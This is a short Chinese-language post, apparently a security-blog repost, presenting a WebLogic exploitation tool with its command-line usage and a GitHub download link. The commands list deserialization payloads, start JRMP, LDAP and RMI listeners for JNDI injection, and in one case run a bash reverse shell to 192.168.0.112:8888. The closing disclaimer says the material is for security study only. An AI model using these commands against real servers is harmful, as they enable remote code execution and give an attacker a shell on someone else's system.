一、工具介绍
工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子,部分功能暂未完善,后续将继续往上加功能。
二、安装与使用1、列出可控payloads
java -jar weblogic.jar -payloads
2、启动JRMPListener
java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe
3、启动LDAP/RMI
LDAPjava -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618RMIjava -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
4、高版本jndi注入 ldap
java -jar weblogic tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app' java -jar weblogic tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'
三、下载地址:https://github.com/8ypass/weblogicExploit
文章来源:系统安全运维
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容